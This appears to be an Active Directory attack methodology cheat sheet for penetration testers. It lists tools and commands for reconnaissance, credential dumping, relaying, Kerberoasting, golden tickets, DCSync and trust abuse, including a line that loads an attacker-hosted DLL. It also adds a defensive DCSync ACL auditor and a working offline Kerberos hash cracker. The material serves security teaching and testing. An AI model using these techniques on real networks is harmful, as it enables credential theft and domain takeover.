
Active Directory


I. Reconnaissance & Enumeration (Pre-Compromise)

  • External Reconnaissance:
    • Identify domain names and subdomains (OSINT, DNSdumpster, Sublist3r)
    • Gather employee names and email addresses (OSINT, Hunter.io, theHarvester)
    • Identify publicly exposed services (Nmap, Shodan)
    • Search for leaked credentials (Have I Been Pwned, DeHashed)
  • Internal Network Mapping (Assuming Initial Access to a Network Point):
    • Identify live hosts (Nmap, Ping, ARP scans)
    • Port scan identified hosts (Nmap, Masscan)
    • Identify running services and versions (Nmap -sV)
  • LDAP Enumeration (Anonymous or Authenticated):
    • Identify Domain Controllers (nltest /dclist:, Nmap LDAP scripts, ADExplorer)
    • Enumerate domain information (ldapsearch, ADExplorer, PowerView)
    • Enumerate users (ldapsearch, PowerView Get-NetUser)
    • Enumerate groups (ldapsearch, PowerView Get-NetGroup)
    • Enumerate computers (ldapsearch, PowerView Get-NetComputer)
    • Enumerate OUs (ldapsearch, ADExplorer)
    • Enumerate Group Policies (PowerView Get-NetGPO)
    • Enumerate ACLs on objects (PowerView Get-ObjectAcl, dsacls)
    • Identify domain trusts (nltest /domain_trusts, PowerView Get-NetDomainTrust)
    • Identify sites and subnets (nltest /siteget, PowerView Get-NetSite)
    • Check whether LDAP signing and channel binding are required (LdapRelayScan, CrackMapExec -M ldap-checker); if signing is not required, NTLM authentication can be relayed to LDAP
  • SMB Enumeration:
    • List shares (Nmap smb-enum-shares, CrackMapExec, smbclient)
    • Check for NULL sessions (rpcclient -U "" -N, enum4linux)
    • Enumerate users via SAMR (enum4linux, CrackMapExec --rid-brute)
    • Enumerate domain policies (enum4linux)
  • DNS Enumeration:
    • Identify internal DNS servers
    • Attempt zone transfers (dig axfr <domain> @<dns-server>; nslookup, then ls -d <domain> interactively); AD-integrated zones normally refuse them
    • Enumerate DNS records (dnsrecon, Nmap dns-brute)
    • Check for ADIDNS stale records (ADIDNSDump)
  • RPC/MSRPC Enumeration:
    • Enumerate RPC endpoints (rpcdump.py)
    • Gather information via specific MSRPC interfaces
  • Kerberos Enumeration:
    • Identify KDC (Key Distribution Center)
    • User enumeration via Kerberos (Kerbrute userenum, nmap script krb5-enum-users)
  • NTP Enumeration:
    • Identify the domain time source and measure clock skew (w32tm /query /source, ntpdate -q <dc>, nmap ntp-info); Kerberos rejects requests more than 5 minutes out of sync by default, so correct skew before ticket attacks
  • BloodHound Data Collection:
    • Run a collector: SharpHound.exe or SharpHound.ps1 from a domain-joined host, or bloodhound-python remotely with valid credentials
    • Analyze data for attack paths (BloodHound GUI)

II. Initial Compromise

  • Password Spraying:
    • Check the lockout policy first (net accounts /domain, CrackMapExec --pass-pol), then try a few common passwords against many users (CrackMapExec, Kerbrute passwordspray, MSF auxiliary/scanner/smb/smb_login)
  • AS-REP Roasting:
    • Identify users with "Do not require Kerberos preauthentication" set (PowerView Get-DomainUser -PreauthNotRequired, Impacket GetNPUsers.py, Rubeus asreproast)
    • Crack AS-REP hashes (Hashcat, John the Ripper)
  • LLMNR/NBT-NS/mDNS Poisoning:
    • Listen for and spoof name resolution requests (Responder, Inveigh)
    • Relay captured hashes (ntlmrelayx.py) or crack them (Hashcat, John the Ripper)
  • SMB Relay Attacks:
    • Relay SMB authentication to other machines (ntlmrelayx.py)
    • Target machines where SMB signing is not required (nmap smb2-security-mode, CrackMapExec --gen-relay-list, Responder's RunFinger.py); Domain Controllers require signing by default
  • Print Spooler (PrintNightmare & variants - CVE-2021-34527, CVE-2021-1675):
    • Check whether the spooler is exposed (rpcdump.py <target> | findstr MS-RPRN, Get-Service Spooler); exploitation needs a valid domain user, so this is post-foothold RCE/LPE rather than an unauthenticated entry point
  • PetitPotam (MS-EFSRPC):
    • Coerce the DC's machine account to authenticate to an attacker host over MS-EFSRPC (PetitPotam.py, Coercer); unpatched DCs allow this without credentials
    • Relay the coerced authentication to the AD CS web enrollment endpoint (ntlmrelayx.py -t http://<ca>/certsrv/certfnsh.asp --adcs) to obtain a DC certificate, then authenticate with it (ESC8)
  • Exploiting Known Vulnerabilities:
    • Scan for unpatched systems (Nessus, OpenVAS, Nmap NSE scripts)
    • Target specific CVEs (e.g., Zerologon - CVE-2020-1472, MS17-010 EternalBlue)
  • Phishing/Spear Phishing:
    • Deliver malicious payloads (executables, documents with macros, links)
  • Web Application Vulnerabilities (on domain-joined servers):
    • Test for common web vulns (SQLi, XSS, RCE)
  • Default/Weak Credentials in Services:
    • Check common services (Tomcat, JBoss, Jenkins, etc.)

III. Credential Dumping & Hash Cracking

  • LSASS Dumping:
    • Mimikatz (sekurlsa::logonpasswords, sekurlsa::msv, sekurlsa::tspkg, sekurlsa::wdigest)
    • ProcDump (procdump -ma lsass.exe lsass.dmp)
    • Task Manager (right-click lsass.exe -> Create dump file)
    • comsvcs.dll MiniDump (rundll32 C:\windows\system32\comsvcs.dll, MiniDump <LSASS_PID> C:\temp\lsass.dmp full); all of the above need local admin or SeDebugPrivilege and fail against LSASS running as PPL without a driver-based bypass
  • SAM/SYSTEM Hive Extraction (Offline):
    • Extract from Volume Shadow Copies
    • Extract from backups
    • Copy the hives (reg save HKLM\SAM sam.hiv, reg save HKLM\SYSTEM system.hiv) and parse them with secretsdump.py -sam sam.hiv -system system.hiv LOCAL or pwdump; the SYSTEM hive supplies the boot key needed to decrypt the SAM
  • NTDS.dit Extraction (Domain Controller):
    • Use ntdsutil.exe (ntdsutil "ac i ntds" "ifm" "create full C:\temp" q q) to write a consistent copy of ntds.dit plus the SYSTEM hive
    • Volume Shadow Copy methods (vssadmin create shadow, diskshadow), then copy ntds.dit and SYSTEM out of the shadow
    • secretsdump.py -just-dc (remote extraction over DRSUAPI, i.e. DCSync, with no file copy)
    • Parse an offline copy with secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL, DSInternals, or Quarks PwDump
  • LSA Secrets:
    • Mimikatz (lsadump::secrets)
    • secretsdump.py
  • DPAPI (Data Protection API):
    • Extract DPAPI master keys (Mimikatz dpapi::masterkey)
    • Decrypt DPAPI protected secrets (SharpDPAPI, DonPAPI)
  • Browser Passwords/Cookies:
    • LaZagne, SharpWeb, BrowseHistoryView
  • Credentials in Files/Registry:
    • GPP Passwords (SYSVOL Groups.xml, Services.xml, ScheduledTasks.xml with a cpassword attribute - PowerSploit Get-GPPPassword, gpp-decrypt, CrackMapExec -M gpp_password); the AES key is published by Microsoft, and although MS14-025 stopped new ones being created, old files often remain
    • Unattend.xml files
    • Web.config files
    • PowerShell transcripts
    • Registry (e.g., WinSCP, VNC passwords)
  • Wireless Network Keys:
    • netsh wlan show profiles key=clear
  • Hash Cracking:
    • Tools: Hashcat, John the Ripper
    • Target: NTLM, NTLMv2, Kerberos tickets, LM

IV. Local Privilege Escalation (Windows)

  • Kernel Exploits:
    • Check OS version and patch level (systeminfo)
    • Search for known exploits (Sherlock, Watson, Windows Exploit Suggester)
  • Insecure Service Permissions:
    • Writable service binaries (accesschk.exe, PowerUp Get-ModifiableServiceFile)
    • Modifiable service configuration (accesschk.exe, PowerUp Get-ModifiableService)
    • Unquoted Service Paths (PowerUp Get-UnquotedService, wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """)
  • DLL Hijacking:
    • Identify missing DLLs loaded by privileged processes (ProcMon)
    • Check for writable directories in PATH
  • AlwaysInstallElevated:
    • Check registry keys: HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated and HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated (reg query); both must be 1, after which any MSI installed with msiexec /quiet /i runs as SYSTEM
  • Scheduled Tasks:
    • Writable task files/actions (accesschk.exe, schtasks /query /v /fo LIST)
    • Tasks running as SYSTEM with modifiable binaries
  • Startup Applications:
    • Writable startup application paths/binaries (accesschk.exe)
  • Registry Misconfigurations:
    • Autoruns keys (HKLM\Software\Microsoft\Windows\CurrentVersion\Run, etc.) - check permissions (accesschk.exe)
    • Weak permissions on HKLM\SYSTEM\CurrentControlSet\Services keys
  • Credential Manager / Stored Credentials:
    • cmdkey /list
    • Mimikatz (vault::cred, token::elevate then vault::cred)
  • Token Impersonation/Theft:
    • Incognito (MSF Meterpreter), Mimikatz (token::*)
    • Identify privileged tokens (Get-Process -IncludeUserName | Select-Object -ExpandProperty UserName)
  • Potato Attacks (SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege):
    • RottenPotato, JuicyPotato (needs a suitable CLSID; does not work on Windows 10 1809+/Server 2019), SweetPotato, GenericPotato (check for required privileges: whoami /priv; service accounts such as IIS and MSSQL usually hold SeImpersonatePrivilege)
  • Password Mining from Memory/Files (already covered in Credential Dumping):
    • Look for passwords in configuration files, scripts, memory dumps
  • Group Policy Preferences (GPP) Passwords (local):
    • If GPP files were cached locally with cpassword
  • Named Pipe Impersonation:
    • Exploit vulnerable named pipe servers
  • Abusing Privileges:
    • SeBackupPrivilege (reg save HKLM\SAM and HKLM\SYSTEM, robocopy /B, diskshadow to copy ntds.dit on a DC)
    • SeRestorePrivilege (write to any file regardless of its ACL, e.g. overwrite a service binary or plant a DLL)
    • SeTakeOwnershipPrivilege (takeown.exe)
    • SeDebugPrivilege (already heavily used by tools like Mimikatz)
    • SeLoadDriverPrivilege (Capcom.sys exploit, KDU)
    • SeCreateTokenPrivilege
    • SeTcbPrivilege
  • Hot Potato / RottenPotatoNG / PrintSpoofer / RoguePotato / GodPotato:
    • Hot Potato needs no privilege (NBNS spoofing plus WPAD, Windows 7/8/2008/2012 era); the others need SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege and are the option on Windows 10 1809+/Server 2019 where JuicyPotato fails.

V. Lateral Movement

  • Pass-the-Hash (PtH):
    • Use NTLM hashes to authenticate (Mimikatz sekurlsa::pth, CrackMapExec, Impacket's psexec.py/smbexec.py/wmiexec.py with -hashes)
  • Pass-the-Ticket (PtT):
    • Use Kerberos tickets (TGTs, TGSs) to authenticate (Mimikatz kerberos::ptt, Rubeus ptt)
    • Requires LSASS access or exported tickets
  • Over-Pass-the-Hash (OPtH) / Pass-the-Key:
    • Request a TGT from a hash or key instead of a password: Over-Pass-the-Hash uses the NTLM hash (yields an RC4 TGT, conspicuous as etype 23), Pass-the-Key uses the AES key (Mimikatz sekurlsa::pth /user /domain /ntlm or /aes256, Rubeus asktgt /user /aes256 /ptt, Impacket getTGT.py -hashes or -aesKey)
  • SMB/PsExec:
    • Execute commands remotely (psexec.exe, CrackMapExec, Impacket's psexec.py, smbexec.py)
  • Windows Management Instrumentation (WMI):
    • Execute commands remotely (wmic.exe, CrackMapExec, Impacket's wmiexec.py, PowerSploit Invoke-WmiCommand)
  • WinRM / PowerShell Remoting:
    • Execute PowerShell commands remotely (Enter-PSSession, Invoke-Command)
    • Check if WinRM is enabled (Test-WSMan)
  • Remote Desktop Protocol (RDP):
    • Connect with valid credentials (mstsc.exe, rdesktop, xfreerdp)
    • RDP session hijacking (tscon)
  • Scheduled Tasks (Remote):
    • Create/modify tasks on remote systems (schtasks /s <target> /create, Impacket atexec.py)
  • DCOM Objects:
    • Utilize DCOM applications for remote execution (e.g., MMC20.Application, ShellBrowserWindow)
  • Exploiting Trust Relationships:
    • Move between domains/forests via trust keys (inter-realm TGT, Mimikatz lsadump::trust /patch)
  • Resource-Based Constrained Delegation (RBCD):
    • If you can write msDS-AllowedToActOnBehalfOfOtherIdentity on a target computer (GenericWrite/WriteDacl over the computer object), add an account you control that has an SPN; with MachineAccountQuota > 0 you can create one (PowerMad New-MachineAccount, Impacket addcomputer.py)
    • Request S4U2self then S4U2proxy as that account to obtain a service ticket impersonating any non-protected user to the target (Rubeus s4u /user /rc4 /impersonateuser /msdsspn /ptt, Impacket getST.py -impersonate)
  • Distributed File System (DFS):
    • Identify DFS shares and target linked servers.

VI. Domain Dominance & Persistence

  • Golden Ticket Attack:
    • Forge a Kerberos TGT for any user with any privileges (Mimikatz kerberos::golden)
    • Requires krbtgt account NTLM hash/AES key
  • Silver Ticket Attack:
    • Forge a Kerberos service ticket for a specific service on a specific host (Mimikatz kerberos::golden /user /domain /sid /target:<host FQDN> /service:<class> /rc4 or /aes256 /ptt); the DC is never contacted, so no 4769 is logged there
    • Requires the key of the account the service runs as, usually the computer account's NTLM hash/AES key, and the service class to forge for (e.g., CIFS for file access, HOST for PsExec/scheduled tasks, HTTP for WinRM, RPCSS for WMI)
  • Skeleton Key:
    • Patch LSASS on DCs to allow a master password for all users (Mimikatz misc::skeleton)
    • Requires DA privileges and LSASS access on DC
  • DSRM (Directory Services Restore Mode) Password Synchronization:
    • Obtain the DSRM (local Administrator of the DC) hash (Mimikatz token::elevate then lsadump::sam on the DC) or set it to match a domain account (ntdsutil "set dsrm password" "sync from domain account <user>"), then set HKLM\System\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior to 2 so the DSRM account may log on over the network, and pass-the-hash to the DC with it
  • AdminSDHolder:
    • Add an ACE for a controlled principal to the AdminSDHolder object (PowerView Add-DomainObjectAcl -TargetIdentity AdminSDHolder -Rights All); SDProp copies it to every protected object (Domain Admins and the other protected groups) within about 60 minutes and re-applies it if an admin removes it
  • Domain Controller Synchronization Rights (DCsync):
    • Grant an account replication rights on the domain head (PowerView Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" -Rights DCSync), then pull any account's secrets without touching ntds.dit (Mimikatz lsadump::dcsync /user:krbtgt, secretsdump.py -just-dc-user)
    • Requires "Replicating Directory Changes" and "Replicating Directory Changes All" on the domain object (plus "In Filtered Set" for RODC-filtered attributes); by default only Domain Controllers, Domain/Enterprise Admins and Administrators hold both
  • SID History:
    • Add a known SID (e.g., the Domain Admins or Enterprise Admins SID) to an account's sIDHistory (Mimikatz sid::patch to disable the NTDS check, then sid::add /sam:<user> /new:<SID>; or DSInternals Add-ADDBSidHistory against an offline ntds.dit)
  • Group Policy Abuse:
    • Modify GPOs to deploy software, run scripts, change local admin groups (Group Policy Management Console, SharpGPOAbuse)
  • Scheduled Tasks on DCs:
    • Create persistent tasks on Domain Controllers
  • Service Creation on DCs:
    • Create persistent services on Domain Controllers (sc.exe create)
  • Active Directory Certificate Services (AD CS) Abuse:
    • ESC1-ESC8 and later escalation paths: misconfigured templates, enrollment agents, CA permissions, NTLM relay to web enrollment (Certify find /vulnerable, Certipy find -vulnerable)
    • Authenticate with a certificate via PKINIT (Rubeus asktgt /certificate, Certipy auth); with the CA's private key, forge certificates for any principal ("golden certificate": Certipy forge, ForgeCert)
  • Shadow Credentials (msDS-KeyCredentialLink):
    • Write a key credential to msDS-KeyCredentialLink of a target user or computer and authenticate as it with PKINIT (Whisker, pyWhisker, Certipy shadow); requires write access to that attribute, Windows Server 2016 domain functional level and a DC that supports PKINIT (normally one holding a certificate from AD CS)
  • DPAPI Domain Backup Keys:
    • Extract DPAPI domain backup keys from a DC to decrypt user DPAPI blobs (Mimikatz lsadump::backupkeys)
  • Modifying SACLs/ACLs:
    • Modify System Access Control Lists or ACLs on critical objects for stealth or re-entry.
  • DNS Admin Privileges:
    • If a user is in the DnsAdmins group, point the DNS service at an attacker DLL (dnscmd <dc> /config /serverlevelplugindll \\<attacker>\share\evil.dll); the DLL loads as SYSTEM when the DNS service is next restarted
  • Backdooring LAPS:
    • If LAPS is used, gain permissions to read LAPS passwords.
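An added example for the DCSync entry in this section (not code from the page): given an ACL of the domain head in the shape PowerView's Get-DomainObjectAcl -ResolveGUIDs returns, list the principals that hold both replication rights and are not expected to. The ACL, the principal names and the BASELINE set are constructed assumptions; the three GUIDs are the real schema controlAccessRight identifiers. A real evaluation would also expand group membership and honour ACE order and inheritance, which this simplification skips.

```python
# Added example: which principals can DCSync, from a PowerView-style ACL of the domain head.
from typing import Dict, Iterable, List, Set

# controlAccessRight GUIDs from the AD schema
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"           # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"       # DS-Replication-Get-Changes-All
GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"  # DS-Replication-Get-Changes-In-Filtered-Set
REPL_RIGHTS = {GET_CHANGES, GET_CHANGES_ALL, GET_CHANGES_FILTERED}
DCSYNC_REQUIRED = {GET_CHANGES, GET_CHANGES_ALL}  # both are needed to pull password data

# Assumed baseline: principals that legitimately replicate; anyone else with both rights is a finding.
BASELINE = {"CORP\\Domain Controllers", "NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS",
            "BUILTIN\\Administrators", "CORP\\Domain Admins", "CORP\\Enterprise Admins"}
NULL_GUID = "00000000-0000-0000-0000-000000000000"


def replication_rights(ace: Dict[str, str]) -> Set[str]:
    """Replication extended rights a single ACE confers. GenericAll, or ExtendedRight
    with no ObjectAceType, grants every extended right, including all three above."""
    rights = {r.strip() for r in ace["ActiveDirectoryRights"].split(",")}
    guid = (ace.get("ObjectAceType") or "").lower()
    if guid == NULL_GUID:
        guid = ""
    if "GenericAll" in rights or ("ExtendedRight" in rights and not guid):
        return set(REPL_RIGHTS)
    if "ExtendedRight" in rights and guid in REPL_RIGHTS:
        return {guid}
    return set()


def dcsync_capable(aces: Iterable[Dict[str, str]]) -> Dict[str, Set[str]]:
    """Principal -> effective replication rights, with Deny ACEs subtracted from Allow ACEs.
    Simplification: no group expansion, no inheritance flags, no ACE ordering."""
    allowed: Dict[str, Set[str]] = {}
    denied: Dict[str, Set[str]] = {}
    for ace in aces:
        bucket = allowed if ace["AceType"] == "AccessAllowed" else denied
        bucket.setdefault(ace["IdentityReference"], set()).update(replication_rights(ace))
    effective = {p: r - denied.get(p, set()) for p, r in allowed.items()}
    return {p: r for p, r in effective.items() if DCSYNC_REQUIRED <= r}


def findings(aces: Iterable[Dict[str, str]]) -> List[str]:
    """Non-baseline principals able to DCSync the domain, sorted."""
    return sorted(p for p in dcsync_capable(aces) if p not in BASELINE)


def _ace(who: str, rights: str, guid: str = "", kind: str = "AccessAllowed") -> Dict[str, str]:
    return {"IdentityReference": who, "ActiveDirectoryRights": rights,
            "ObjectAceType": guid, "AceType": kind}


# Constructed ACL for DC=corp,DC=local (shape of Get-DomainObjectAcl -ResolveGUIDs output).
SAMPLE_ACL = [
    _ace("CORP\\Domain Controllers", "ExtendedRight", GET_CHANGES),
    _ace("CORP\\Domain Controllers", "ExtendedRight", GET_CHANGES_ALL),
    _ace("NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS", "ExtendedRight", GET_CHANGES),
    _ace("NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS", "ExtendedRight", GET_CHANGES_ALL),
    _ace("BUILTIN\\Administrators", "ExtendedRight"),                         # all extended rights
    _ace("CORP\\backupsvc", "ExtendedRight", GET_CHANGES),                     # only one of the pair: cannot DCSync
    _ace("CORP\\helpdesk", "ExtendedRight", GET_CHANGES),
    _ace("CORP\\helpdesk", "ExtendedRight", GET_CHANGES_ALL),                  # finding: granted both
    _ace("CORP\\webadmin", "GenericAll"),                                      # finding: implies all extended rights
    _ace("CORP\\auditor", "GenericAll"),
    _ace("CORP\\auditor", "ExtendedRight", GET_CHANGES_ALL, "AccessDenied"),   # deny wins: not capable
]

if __name__ == "__main__":
    print("DCSync findings:", findings(SAMPLE_ACL))
```

Running it against SAMPLE_ACL reports helpdesk and webadmin; backupsvc is excluded because a single replication right is not enough, and auditor because the Deny ACE removes Get-Changes-All.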

VII. Specific Kerberos Attacks

  • Kerberoasting:
    • Request a service ticket for every account with an SPN (Impacket GetUserSPNs.py -request, PowerView Get-DomainUser -SPN / Invoke-Kerberoast, Rubeus kerberoast); prefer RC4 (etype 23) tickets, they crack far faster than AES
    • Crack service account hashes offline (Hashcat, John the Ripper)
  • AS-REP Roasting (already listed):
    • Target users without Kerberos pre-authentication
  • Unconstrained Delegation:
    • Identify hosts with unconstrained delegation (PowerView Get-NetComputer -Unconstrained, BloodHound)
    • Coerce authentication from a DC to these hosts (PrinterBug/SpoolSample, PetitPotam) and capture the forwarded TGTs on the unconstrained host (Rubeus monitor /interval, Mimikatz sekurlsa::tickets /export); a DC's TGT enables DCSync
  • Constrained Delegation (Traditional & RBCD):
    • Identify accounts/computers configured for constrained delegation (PowerView, BloodHound)
    • If the account has "use any authentication protocol" set (TrustedToAuthForDelegation, protocol transition), S4U2self yields a forwardable ticket for any user and S4U2proxy turns it into a service ticket for the allowed SPNs (Rubeus s4u /impersonateuser /msdsspn /altservice, Impacket getST.py); without protocol transition you first need a ticket from the user
    • For RBCD, see Lateral Movement section.
  • "NoPAC" / SAM Account Name Spoofing (CVE-2021-42278 & CVE-2021-42287):
    • Create or control a computer account, clear its SPNs, rename its sAMAccountName to a DC's name without the trailing $, request a TGT, rename it back, then S4U2self as the DC (noPac.py, sam-the-admin); needs MachineAccountQuota > 0 or an existing machine account, and an unpatched DC
  • Diamond Ticket (Modifying TGT):
    • Request a real TGT, decrypt it with the krbtgt key, alter the PAC (user, RID, groups), re-encrypt and use it (Rubeus diamond /krbkey /tgtdeleg /ticketuser /ticketuserid /groups, Impacket ticketer.py -request); unlike a golden ticket the timestamps and structure come from the KDC, which defeats detections that look for forged-ticket artefacts.
  • Sapphire Ticket:
    • Like a diamond ticket, but the PAC is not edited by hand: the PAC of a privileged user is obtained legitimately through S4U2self + User-to-User and placed into the ticket, so every field is KDC-generated (Impacket ticketer.py -request -impersonate); still requires the krbtgt key.
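An added example, not code from this page, serving the Hash Cracking entry (section III), AS-REP Roasting (II) and Kerberoasting above: it shows how the NT hash is formed (unsalted MD4 over UTF-16LE, which is why pass-the-hash works and why it cracks fast), how the KDC encrypts an RC4-HMAC (etype 23) enc-part, and the check a cracker runs per candidate on a hashcat 13100 or 18200 line. Pure standard library Python; the password, account names, SPN, realm and ticket body are constructed demo values, and the ticket body is a placeholder rather than real ASN.1.

```python
# Added example: NT hash and offline RC4-HMAC (etype 23) roast checking. Demo data is constructed.
import hashlib
import hmac
import os
import struct
from typing import Iterable, Optional, Tuple

_M = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib lacks MD4 on many OpenSSL 3 builds."""
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & _M
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64) + struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = ((f, 0, range(16), (3, 7, 11, 19)),
              (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
              (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)))
    for off in range(0, len(msg), 64):
        x, r = struct.unpack("<16I", msg[off:off + 64]), state[:]
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = (-i) % 4  # register being updated rotates a, d, c, b
                mix = fn(r[(a + 1) % 4], r[(a + 2) % 4], r[(a + 3) % 4])
                r[a] = rotl((r[a] + mix + x[k] + const) & _M, shifts[i % 4])
        state = [(s + v) & _M for s, v in zip(state, r)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = unsalted MD4 over UTF-16LE: the hash itself is a credential (pass-the-hash)
    and cracks at raw MD4 speed because there is no salt or iteration."""
    return md4(password.encode("utf-16-le"))


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def _rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


USAGE_TGS_TICKET, USAGE_AS_REP = 2, 8  # RFC 4120 key usages: ticket enc-part, AS-REP enc-part


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: Optional[bytes] = None) -> bytes:
    """RFC 4757 etype 23 as the KDC does it: K1 = HMAC-MD5(K, usage); output = checksum || RC4(K3, conf||pt)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = (confounder or os.urandom(8)) + plaintext
    checksum = _hmac_md5(k1, data)
    return checksum + _rc4(_hmac_md5(k1, checksum), data)


def parse_line(line: str) -> Tuple[int, bytes, bytes]:
    """(key usage, checksum, ciphertext) from a hashcat 13100 line ($krb5tgs$23$*u$R$spn*$chk$data)
    or an 18200 line ($krb5asrep$23$u@R:chk$data)."""
    fields = line.split("$")
    if fields[1] == "krb5tgs":
        usage, chk = USAGE_TGS_TICKET, fields[-2]
    elif fields[1] == "krb5asrep":
        usage, chk = USAGE_AS_REP, fields[-2].rsplit(":", 1)[1]
    else:
        raise ValueError("unsupported hash line")
    return usage, bytes.fromhex(chk), bytes.fromhex(fields[-1])


def crack_rc4_hmac(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Per candidate: NT hash -> K1 -> K3 -> decrypt -> recompute HMAC-MD5 and compare with the
    checksum. The cracking itself is entirely offline: no KDC traffic, no lockouts."""
    usage, checksum, edata = parse_line(line)
    usage_bytes = struct.pack("<I", usage)
    for candidate in wordlist:
        k1 = _hmac_md5(nt_hash(candidate), usage_bytes)
        plain = _rc4(_hmac_md5(k1, checksum), edata)
        if hmac.compare_digest(_hmac_md5(k1, plain), checksum):
            return candidate
    return None


# Constructed demo: weak service-account password, placeholder ticket body (not real ASN.1).
BODY = b"\x63\x82\x01\x00 EncTicketPart placeholder " * 4
TGS_ENC = rc4_hmac_encrypt(nt_hash("Summer2023!"), USAGE_TGS_TICKET, BODY, b"\0" * 8)
TGS_LINE = f"$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*${TGS_ENC[:16].hex()}${TGS_ENC[16:].hex()}"
ASREP_ENC = rc4_hmac_encrypt(nt_hash("Welcome1"), USAGE_AS_REP, BODY, b"\0" * 8)
ASREP_LINE = f"$krb5asrep$23$jdoe@CORP.LOCAL:{ASREP_ENC[:16].hex()}${ASREP_ENC[16:].hex()}"
WORDLIST = ["password", "Welcome1", "Summer2023!", "P@ssw0rd"]

if __name__ == "__main__":
    print("NT(password) =", nt_hash("password").hex())
    print("kerberoast  ->", crack_rc4_hmac(TGS_LINE, WORDLIST))
    print("asreproast  ->", crack_rc4_hmac(ASREP_LINE, WORDLIST))
```

The only difference between the two roast formats is the key usage number fed into K1 (2 for a service ticket, 8 for the AS-REP enc-part); everything else, including the per-guess cost of one MD4 plus three HMAC-MD5 and one RC4, is identical, which is why both are cracked at similar speed and why AES-only service accounts are the mitigation.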

VIII. Forest & Trust Attacks

  • Trust Ticket Abuse:
    • Forge inter-realm TGTs if trust keys are compromised (Mimikatz lsadump::trust /patch, then kerberos::golden for cross-trust)
  • SID History on Trust Accounts:
    • Forge an inter-realm TGT carrying an extra SID in the PAC; within a forest, SID filtering is not applied on parent/child trusts, so adding the root domain's Enterprise Admins SID (S-1-5-21-<root domain>-519) escalates from a child domain to the forest root (Mimikatz kerberos::golden /sids, Impacket ticketer.py -extra-sid). Across forest trusts, SID filtering strips these unless it has been disabled.
  • Exploiting Weak Trust Configurations:
    • Identify trusts with weak settings: SID filtering disabled (netdom trust /quarantine:no), SID history allowed across a forest trust (/enablesidhistory:yes), selective authentication off (PowerView Get-DomainTrust, nltest /domain_trusts, TrustAttributes flags).
  • Abusing trust account keys:
    • Both sides of a trust share the inter-realm key, stored as a trust account (e.g. CHILD$ in the parent domain); dumping it from either side (Mimikatz lsadump::trust /patch, lsadump::dcsync /user:CHILD$) lets you forge referral tickets into the other domain until the key rotates (every 30 days by default).